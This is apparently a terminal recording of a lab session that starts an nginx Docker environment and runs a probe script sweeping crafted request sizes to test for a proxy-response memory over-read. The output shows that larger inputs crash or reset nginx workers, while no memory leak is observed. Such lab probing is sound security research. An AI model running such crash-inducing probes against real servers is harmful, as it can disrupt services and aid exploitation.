{"version":3,"term":{"cols":150,"rows":44,"type":"xterm-256color"},"timestamp":1779063089,"idle_time_limit":1.0,"command":"bash -lc '\nset -euo pipefail\ncompose=\"docker compose -f env/docker-compose.yml -f env/docker-compose.lfi.yml -f env/docker-compose.nonlfi-leak.yml\"\nprintf \"lab$ %s up -d --force-recreate\\n\\n\" \"$compose\"\n$compose up -d --force-recreate\n\ntarget_ip=$(docker inspect -f \"{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}\" env-nginx-1)\ncmd=\"docker run --rm --platform linux/amd64 --network env_default --entrypoint python3 -v \\\"${PWD}:/work\\\" -w /work nginx-rift-ctf-lfi tools/non_lfi_active_response_probe.py --target ${target_ip}:19321 --plus-counts 64,128,256,512,962 --suffixes 000000,ZZZZZZ,~~~~~~ --victims 4 --victim-delay 0.6 --recv-timeout 2.0\"\nprintf \"\\nlab$ target_ip=%s\\n\" \"$target_ip\"\nprintf \"lab$ %s\\n\\n\" \"$cmd\"\neval \"$cmd\"\n'","title":"NGINX Rift non-LFI active response probe classified","env":{"SHELL":"/opt/homebrew/bin/fish"}}
[0.309, "o", "lab$ docker compose -f env/docker-compose.yml -f env/docker-compose.lfi.yml -f env/docker-compose.nonlfi-leak.yml up -d --force-recreate\r\n\r\n"]
[0.134, "o", "\u001b[?25l\u001b[0G[+] up 0/1\r\n"]
[0.000, "o", " ⠋ Container env-nginx-1 Recreate                                                                                                                 0.1s\r\n\u001b[?25h"]
[0.101, "o", "\u001b[?25l\u001b[2A\u001b[0G[+] up 0/1\r\n ⠙ Container env-nginx-1 Recreate                                                                                                                 0.2s\r\n\u001b[?25h"]
[0.100, "o", "\u001b[?25l\u001b[2A\u001b[0G[+] up 0/1\r\n ⠹ Container env-nginx-1 Starting                                                                                                                 0.3s\r\n\u001b[?25h"]
[0.008, "o", "\u001b[?25l\u001b[2A\u001b[0G[+] up 1/1\r\n ✔ Container env-nginx-1 Started                                                                                                                  0.3s\r\n\u001b[?25h"]
[0.065, "o", "\r\nlab$ target_ip=172.21.0.2\r\nlab$ docker run --rm --platform linux/amd64 --network env_default --entrypoint python3 -v \"/Users/hamid/Downloads/temp/nginx-rift/Nginx-Rift:/work\" -w /work nginx-rift-ctf-lfi tools/non_lfi_active_response_probe.py --target 172.21.0.2:19321 --plus-counts 64,128,256,512,962 --suffixes 000000,ZZZZZZ,~~~~~~ --victims 4 --victim-delay 0.6 --recv-timeout 2.0\r\n\r\n"]
[10.061, "o", "[*] target=http://172.21.0.2:19321\r\n[*] primitive=remote HTTP only; no LFI/phpinfo/procfs/core reads\r\n[*] active candidate=delayed /spray proxy response over-read\r\n\r\n[+] plus_count=64 suffix='000000' victims=4\r\n    trigger status: <no response> err=-\r\n    trigger body: len=0 nonprint=0 ptr_like=0\r\n    victim 1: clean status='HTTP/1.1 200 OK' len=11 nonprint=0 ptr_like=0 err=-\r\n    victim 2: clean status='HTTP/1.1 200 OK' len=11 nonprint=0 ptr_like=0 err=-\r\n    victim 3: clean status='HTTP/1.1 200 OK' len=11 nonprint=0 ptr_like=0 err=-\r\n    victim 4: clean status='HTTP/1.1 200 OK' len=11 nonprint=0 ptr_like=0 err=-\r\n\r\n[+] plus_count=64 suffix='ZZZZZZ' victims=4\r\n    trigger status: <no response> err=-\r\n    trigger body: len=0 nonprint=0 ptr_like=0\r\n    victim 1: clean status='HTTP/1.1 200 OK' len=11 nonprint=0 ptr_like=0 err=-\r\n    victim 2: clean status='HTTP/1.1 200 OK' len=11 nonprint=0 ptr_like=0 err=-\r\n    victim 3: clean status='HTTP/1.1 200 OK' len=11 nonprint=0 ptr_like=0 err=-\r\n    victim 4: clean sta"]
[0.000, "o", "tus='HTTP/1.1 200 OK' len=11 nonprint=0 ptr_like=0 err=-\r\n\r\n[+] plus_count=64 suffix='~~~~~~' victims=4\r\n    trigger status: <no response> err=-\r\n    trigger body: len=0 nonprint=0 ptr_like=0\r\n    victim 1: clean status='HTTP/1.1 200 OK' len=11 nonprint=0 ptr_like=0 err=-\r\n    victim 2: clean status='HTTP/1.1 200 OK' len=11 nonprint=0 ptr_like=0 err=-\r\n    victim 3: clean status='HTTP/1.1 200 OK' len=11 nonprint=0 ptr_like=0 err=-\r\n    victim 4: clean status='HTTP/1.1 200 OK' len=11 nonprint=0 ptr_like=0 err=-\r\n\r\n[+] plus_count=128 suffix='000000' victims=4\r\n    trigger status: <no response> err=-\r\n    trigger body: len=0 nonprint=0 ptr_like=0\r\n    victim 1: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 2: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 3: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 4: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n\r\n[+] plus_count=128 suffix='ZZZZZZ' victims=4\r\n    trigger"]
[0.000, "o", " status: <no response> err=-\r\n    trigger body: len=0 nonprint=0 ptr_like=0\r\n    victim 1: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 2: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 3: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 4: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n\r\n[+] plus_count=128 suffix='~~~~~~' victims=4\r\n    trigger status: <no response> err=-\r\n    trigger body: len=0 nonprint=0 ptr_like=0\r\n    victim 1: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 2: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 3: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 4: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n\r\n[+] plus_count=256 suffix='000000' victims=4\r\n    trigger status: <no response> err=-\r\n    trigger body: len=0 nonprint=0 ptr_like=0\r\n    victim 1: reset status='<no response>' len=0 no"]
[0.000, "o", "nprint=0 ptr_like=0 err=-\r\n    victim 2: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 3: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 4: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n\r\n[+] plus_count=256 suffix='ZZZZZZ' victims=4\r\n    trigger status: <no response> err=-\r\n    trigger body: len=0 nonprint=0 ptr_like=0\r\n    victim 1: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 2: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 3: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 4: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n\r\n[+] plus_count=256 suffix='~~~~~~' victims=4\r\n    trigger status: <no response> err=-\r\n    trigger body: len=0 nonprint=0 ptr_like=0\r\n    victim 1: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 2: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 3: reset sta"]
[0.000, "o", "tus='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 4: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n\r\n[+] plus_count=512 suffix='000000' victims=4\r\n    trigger status: <no response> err=-\r\n    trigger body: len=0 nonprint=0 ptr_like=0\r\n    victim 1: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 2: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 3: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 4: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n\r\n[+] plus_count=512 suffix='ZZZZZZ' victims=4\r\n    trigger status: <no response> err=-\r\n    trigger body: len=0 nonprint=0 ptr_like=0\r\n    victim 1: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 2: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 3: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 4: reset status='<no response>' len=0 nonprint=0 ptr_like=0 er"]
[0.000, "o", "r=-\r\n\r\n[+] plus_count=512 suffix='~~~~~~' victims=4\r\n    trigger status: <no response> err=-\r\n    trigger body: len=0 nonprint=0 ptr_like=0\r\n    victim 1: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 2: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 3: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 4: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n\r\n[+] plus_count=962 suffix='000000' victims=4\r\n    trigger status: HTTP/1.1 404 Not Found err=-\r\n    trigger body: len=153 nonprint=0 ptr_like=0\r\n    victim 1: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 2: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 3: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 4: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n\r\n[+] plus_count=962 suffix='ZZZZZZ' victims=4\r\n    trigger status: HTTP/1.1 404 Not Found err=-\r\n    trigger bo"]
[0.000, "o", "dy: len=153 nonprint=0 ptr_like=0\r\n    victim 1: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 2: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 3: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 4: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n\r\n[+] plus_count=962 suffix='~~~~~~' victims=4\r\n    trigger status: HTTP/1.1 404 Not Found err=-\r\n    trigger body: len=153 nonprint=0 ptr_like=0\r\n    victim 1: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 2: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 3: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n    victim 4: reset status='<no response>' len=0 nonprint=0 ptr_like=0 err=-\r\n\r\n[*] summary: clean=12 reset=48 interesting=0\r\n[+] no active response over-read observed in this sweep\r\n[*] worker resets/crashes occurred, but victim responses did not leak memory\r\n"]
[0.173, "x", "0"]
